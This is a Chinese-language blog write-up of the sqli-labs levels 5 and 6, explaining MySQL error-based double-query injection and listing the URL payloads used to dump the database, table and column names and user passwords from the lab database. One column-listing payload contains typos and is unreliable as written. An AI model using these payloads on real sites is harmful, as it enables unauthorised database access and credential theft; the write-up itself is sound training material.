<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>sqli-labs 5-6 | Hexo</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="sqli-labs 5-6一开始我以为就跟前面四关一样，是个简单的sql注入。常规做法发现做不出来，然后去看题目名称，Double Injection(双查询注入)，就懂了。 先介绍几个需要用到的语句rand()函数 先来看看这个函数的作用，我们多执行几次 1select rand();   可以看到，这个函数就是随机返回0~1之间的数 floor()函数 先看看单独使用的效果 12select">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs 5-6">
<meta property="og:url" content="http://ymmmmmmin.github.io.git/2022/01/24/sqli-labs-5-6/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="sqli-labs 5-6一开始我以为就跟前面四关一样，是个简单的sql注入。常规做法发现做不出来，然后去看题目名称，Double Injection(双查询注入)，就懂了。 先介绍几个需要用到的语句rand()函数 先来看看这个函数的作用，我们多执行几次 1select rand();   可以看到，这个函数就是随机返回0~1之间的数 floor()函数 先看看单独使用的效果 12select">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/rand%E5%87%BD%E6%95%B0.png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/floor()(1).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/floor()(2).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/concat(2).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/concat(5).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/concat(3).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/concat(4).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(1).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(2).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(3).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(5).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(6).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(7).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(8).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(9).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(10).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(11).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(12).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(13).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(14).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(15).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(16).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(17).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-5(18).png">
<meta property="og:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/sqlless-6(1).png">
<meta property="article:published_time" content="2022-01-24T08:46:30.000Z">
<meta property="article:modified_time" content="2022-01-25T05:55:31.513Z">
<meta property="article:author" content="YmmmmmmIN">
<meta property="article:tag" content="博客">
<meta property="article:tag" content="hexo">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://ymmmmmmin.github.io.git/2022/01/24/images/rand%E5%87%BD%E6%95%B0.png">
  
    <link rel="alternative" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  

  
<script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>

  
<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>


  
<meta name="generator" content="Hexo 5.4.0"></head>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
				<img lazy-src="" class="js-avatar">
			
		</a>

		<hgroup>
			<h1 class="header-author"><a href="/">YmmmmmmIN</a></h1>
		</hgroup>

		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">Home</a></li>
				        
							<li><a href="/archives">Archives</a></li>
				        
						</ul>
					</nav>
					<nav class="half-header-menu">
						<a class="hide">Home</a>
						<a>Tags</a>
						<a>Links</a>
						<a>About</a>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
						</div>
						<!-- music -->
						
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						<a href="/tags/hexo/" style="font-size: 10px;">hexo</a> <a href="/tags/%E5%8D%9A%E5%AE%A2/" style="font-size: 10px;">博客</a>
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://github.com/">github</a>
			        
			        </div>
				</section>
				

				
				
				<section class="switch-part switch-part4">
				
					<div id="js-aboutme">I&#39;m a developer.</div>
				</section>
				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide"></h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author"></h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">Home</a></li>
		        
					<li><a href="/archives">Archives</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-sqli-labs-5-6" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2022/01/24/sqli-labs-5-6/" class="article-date">
  	<time datetime="2022-01-24T08:46:30.000Z" itemprop="datePublished">2022-01-24</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      sqli-labs 5-6
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
	<div class="article-tag tagcloud">
		<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/hexo/" rel="tag">hexo</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2/" rel="tag">博客</a></li></ul>
	</div>

        
	<div class="article-category tagcloud">
	<a class="article-category-link" href="/categories/sql%E6%B3%A8%E5%85%A5/">sql注入</a>
	</div>


        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="sqli-labs-5-6"><a href="#sqli-labs-5-6" class="headerlink" title="sqli-labs 5-6"></a>sqli-labs 5-6</h1><p>一开始我以为就跟前面四关一样，是个简单的sql注入。常规做法发现做不出来，然后去看题目名称，Double Injection(双查询注入)，就懂了。</p>
<h3 id="先介绍几个需要用到的语句"><a href="#先介绍几个需要用到的语句" class="headerlink" title="先介绍几个需要用到的语句"></a>先介绍几个需要用到的语句</h3><p><strong>rand()函数</strong></p>
<p>先来看看这个函数的作用，我们多执行几次</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> rand();</span><br></pre></td></tr></table></figure>

<p><img src="../images/rand%E5%87%BD%E6%95%B0.png" alt="rand函数"></p>
<p>可以看到，这个函数就是随机返回0~1之间的数</p>
<p><strong>floor()函数</strong></p>
<p>先看看单独使用的效果</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="built_in">floor</span>(<span class="number">45.6496464</span>);</span><br><span class="line"><span class="keyword">select</span> <span class="built_in">floor</span>(<span class="number">12.5649794</span>);</span><br></pre></td></tr></table></figure>

<p><img src="../images/floor()(1).png" alt="floor()(1)"></p>
<p>很明显，整个函数就是取整（小于等于自身的整数）的作用。</p>
<p>在看看一个简单组合</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="built_in">floor</span>(rand()<span class="operator">*</span><span class="number">2</span>);</span><br></pre></td></tr></table></figure>

<p>我们从里向外看，rand()*2是为了使整个函数最后的结果只有0或1</p>
<p><img src="../images/floor()(2).png" alt="floor()(2)"></p>
<p>接下来我们看下这个查询</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> concat((<span class="keyword">select</span> database()),<span class="built_in">floor</span>(rand()<span class="operator">*</span><span class="number">2</span>));</span><br></pre></td></tr></table></figure>

<p>看到这么复杂的组合语句，先冷静。先看最里面的select database()就是返回数据库名，因为我这里用的是security所以这里就是security。而concat就是连接数据库名和floor。</p>
<p><img src="../images/concat(2).png" alt="concat(2)"></p>
<p>如果我们把这条语句后面加上from 一个表名。那么一般会返回security0或security1的一个集合。而数目是由表本身有几条结果决定的。这里的users表里有13个用户，所以返回了13条。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> concat((<span class="keyword">select</span> database()),<span class="built_in">floor</span>(rand()<span class="operator">*</span><span class="number">2</span>)) <span class="keyword">from</span>  users</span><br></pre></td></tr></table></figure>

<p><img src="../images/concat(5).png" alt="concat(5)"></p>
<p>接下来再加上group by语句</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> concat((<span class="keyword">select</span> database()), <span class="built_in">floor</span>(rand()<span class="operator">*</span><span class="number">2</span>))<span class="keyword">as</span> a <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> a;</span><br></pre></td></tr></table></figure>

<p>我们把 concat((select database()),floor(rand()*2)) 这个结果取名为a，使用它进行分组。这样相同的security 0就分到一组，security 1分到一组，就剩下两个结果了。</p>
<p><img src="../images/concat(3).png" alt="concat(3)"></p>
<p>注意这里的database()可以替换成任何你想查的函数，比如version(), user(), datadir()或者其他的查询。比如查表、查列，这些原理都是一样的。</p>
<p>！最后加上一个聚合函数count(*)</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>), concat((<span class="keyword">select</span> database()), <span class="built_in">floor</span>(rand()<span class="operator">*</span><span class="number">2</span>))<span class="keyword">as</span> a <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> a;</span><br></pre></td></tr></table></figure>

<p>发现第一次竟然报错了，但是第二次又能成功</p>
<p><img src="../images/concat(4).png" alt="concat(4)"></p>
<p>这就说明，如果想要页面爆出你想要的数据来，点击一次是没用的，只有点第二次数据库才会报错，才会回显。</p>
<p>接下来就运用上面的函数进行sql注入</p>
<h3 id="第五关"><a href="#第五关" class="headerlink" title="第五关"></a>第五关</h3><p><strong>1.老样子，先判断注入点类型</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span></span><br></pre></td></tr></table></figure>

<p><img src="../images/sqlless-5(1).png" alt="sqlless-5(1)"></p>
<p>回显正常 加个单引号试试</p>
<p><img src="../images/sqlless-5(2).png" alt="sqlless-5(2)"></p>
<p>页面回显错误，将单引号注释掉</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">&#x27;--+</span></span><br></pre></td></tr></table></figure>

<p><img src="../images/sqlless-5(3).png" alt="sqlless-5(3)"></p>
<p>页面回显正常，发现是单引号闭合的字符型注入</p>
<p><strong>2.使用order by 语句判断，一共有几列数据</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">&#x27; order by 1--+</span></span><br></pre></td></tr></table></figure>

<p>回显正常一直到4时，页面回显不正常</p>
<p><img src="../images/sqlless-5(5).png" alt="sqlless-5(5)"></p>
<p>发现一共有三列数据</p>
<p><strong>3.开始查库</strong></p>
<p>一开始按照原来的方法进行联合查询先找回显位置</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27; union select 1,2,3--+</span></span><br></pre></td></tr></table></figure>

<p>发现页面没啥反应，只会出现you are in…….</p>
<p><img src="../images/sqlless-5(6).png" alt="sqlless-5(6)"></p>
<p>就想到使用上面的方法进行双查询注入</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27; union select null,count(*),concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a--+</span></span><br></pre></td></tr></table></figure>

<p>这是第一次查数据库，页面没啥反应</p>
<p><img src="../images/sqlless-5(7).png" alt="sqlless-5(7)"></p>
<p>第二次点击，就爆出了数据库名</p>
<p><img src="../images/sqlless-5(8).png" alt="sqlless-5(8)"></p>
<p><strong>4.爆表名</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27; union select null,count(*),concat((select (table_name) from information_schema.tables where table_schema=&#x27;</span>security<span class="string">&#x27;),floor(rand()*2)) as a from information_schema.tables group by a--+</span></span><br></pre></td></tr></table></figure>

<p><img src="../images/sqlless-5(9).png" alt="sqlless-5(9)"></p>
<p>这里又遇到一个问题 ：</p>
<p>这里多了一个键，键1已经存在虚拟表中，由于键只能唯一，所以此时就会报错。数据表中至少要有3条记录才会报错，所以我们在第二条select语句末尾加上limit x,1即可让它报错继续注入</p>
<p>第一张表：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27; union select null,count(*),concat((select(table_name) from information_schema.tables where table_schema=&#x27;</span>security<span class="string">&#x27;limit 0,1),floor(rand()*2))as a from information_schema.tables group by a--+</span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></figure>

<p><img src="../images/sqlless-5(10).png" alt="sqlless-5(10)"></p>
<p><strong>注意：在爆的时候有可能需要点击两次及以上，可能一次查不出来，多查几次就出来了。</strong></p>
<p><img src="../images/sqlless-5(11).png" alt="sqlless-5(11)"></p>
<p>第二张表：</p>
<p><img src="../images/sqlless-5(12).png" alt="sqlless-5(12)"></p>
<p>第三张表：</p>
<p><img src="../images/sqlless-5(13).png" alt="sqlless-5(13)"></p>
<p>第四张表：</p>
<p><img src="../images/sqlless-5(14).png" alt="sqlless-5(14)"></p>
<p><strong>当想查第五张表时，不管查多少次页面都是you are in…..证明一共就四张表</strong></p>
<p><strong>5.爆列名</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27; union select null,count(*),concat((select(columns_name) form information_schema.columns where table_name=&#x27;</span>users<span class="string">&#x27;limit 0,1),floor(rand()*2))as a from infomation_shcema.tables group by a--+</span></span><br></pre></td></tr></table></figure>

<p><img src="../images/sqlless-5(15).png" alt="sqlless-5(15)"></p>
<p>通过改变 limit x,1 中的x可以爆出其他列名</p>
<p>最后可以得到两个有用的列名</p>
<p><img src="../images/sqlless-5(16).png" alt="sqlless-5(16)"></p>
<p><img src="../images/sqlless-5(17).png" alt="sqlless-5(17)"></p>
<p><strong>6.爆字段</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27; union select null,count(*),concat((select concat(username,0x7e,password)from security.users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a--+</span></span><br></pre></td></tr></table></figure>

<p><img src="../images/sqlless-5(18).png" alt="sqlless-5(18)"></p>
<p>一样的通过改变limit后面的值，得到其他的数据。</p>
<h3 id="第六关"><a href="#第六关" class="headerlink" title="第六关"></a>第六关</h3><p>第六关与第五关差异不大，由单引号错误变成双引号错误</p>
<p><img src="../images/sqlless-6(1).png" alt="sqlless-6(1)"></p>
<p>其他都与第五关相同，做法参照第五关的解法。</p>
<p>+++</p>
<p><strong>总结：不同于前四关，后面的难度更大，需要补充一些双查询注入的知识，在解题过程中不要着急，多多尝试。</strong></p>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2022/01/19/sql-labs-1-4/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">sqli-labs  1-4</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>






</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2022 YmmmmmmIN
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/preccrep/hexo-theme-jelly" target="_blank">Jelly</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">



<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: false,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>

<script src="/js/main.js"></script>




  </div>
</body>
</html>